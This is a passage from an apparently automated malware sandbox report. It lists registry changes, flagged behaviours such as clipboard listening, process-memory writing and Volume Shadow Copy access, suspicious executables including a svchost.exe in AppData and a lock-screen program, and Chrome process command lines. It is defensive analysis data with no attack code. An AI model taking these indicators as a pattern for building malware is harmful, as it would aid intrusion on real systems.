| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2c | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2C | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2D | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133594126605321130" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2B | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList\Net\1 = "C:\\ProgramData\\Package Cache\\{19AFE054-CA83-45D5-A9DB-4108EF4BD391}v14.38.33135\\packages\\vcRuntimeAdditional_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\88AAB0B9F51EF1A3CA0C2B609EDD7FC1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{19AFE054-CA83-45D5-A9DB-4108EF4BD391}v14.38.33135\\packages\\vcRuntimeAdditional_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.38,bundle\Version = "14.38.33135.0" | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\09A86F63C932FD435BC8463B1035EC53 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8A567BD6FA501A947AD1F646E53EEC14\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.38,bundle\Dependents\{c649ede4-f16a-4486-a117-dcc2f2a35165} | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8800A266DCF6DD54E97A86760485EA5D | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\88AAB0B9F51EF1A3CA0C2B609EDD7FC1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14\Dependents\{c649ede4-f16a-4486-a117-dcc2f2a35165} | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.38,bundle\ = "{c649ede4-f16a-4486-a117-dcc2f2a35165}" | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\Version = "237404527" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1162180587-977231257-2194346871-1000\{E13D8DD1-AFA3-4019-9CF8-8CD61803E834} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\PackageCode = "1688782943A356649B2B29F7077E1BE1" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5BA8C0AA792764D40A9D8090F65EE964 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8A567BD6FA501A947AD1F646E53EEC14\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\INSTALLER\DEPENDENCIES\VC,REDIST.X64,AMD64,14.30,BUNDLE\DEPENDENTS\{57A73DF6-4BA9-4C1D-BBBB-517289FF6C13} | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14\ = "{AA0C8AB5-7297-4D46-A0D9-08096FE59E46}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\SourceList\PackageName = "vc_runtimeMinimum_x64.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8A567BD6FA501A947AD1F646E53EEC14 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14\ = "{19AFE054-CA83-45D5-A9DB-4108EF4BD391}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.38,bundle\DisplayName = "Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.38.33135" | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14 | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5BA8C0AA792764D40A9D8090F65EE964\VC_Runtime_Minimum | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\450EFA9138AC5D549ABD1480FEB43D19\VC_Runtime_Additional | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.38,bundle\Dependents | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8800A266DCF6DD54E97A86760485EA5D\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Documents" | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8800A266DCF6DD54E97A86760485EA5D\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{AA0C8AB5-7297-4D46-A0D9-08096FE59E46}v14.38.33135\\packages\\vcRuntimeMinimum_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8A567BD6FA501A947AD1F646E53EEC14 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\68B2.tmp\CreepScreen.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\63FF.tmp\Cov29LockScreen.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://q
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb017eab58,0x7ffb017eab68,0x7ffb017eab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2224 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2980 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4496 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3328 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4536 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4976 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4944 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4300 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3176 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4980 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5052 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5032 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5024 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=2976 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4940 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5152 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5316 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4400 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5212 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2392 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5248 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
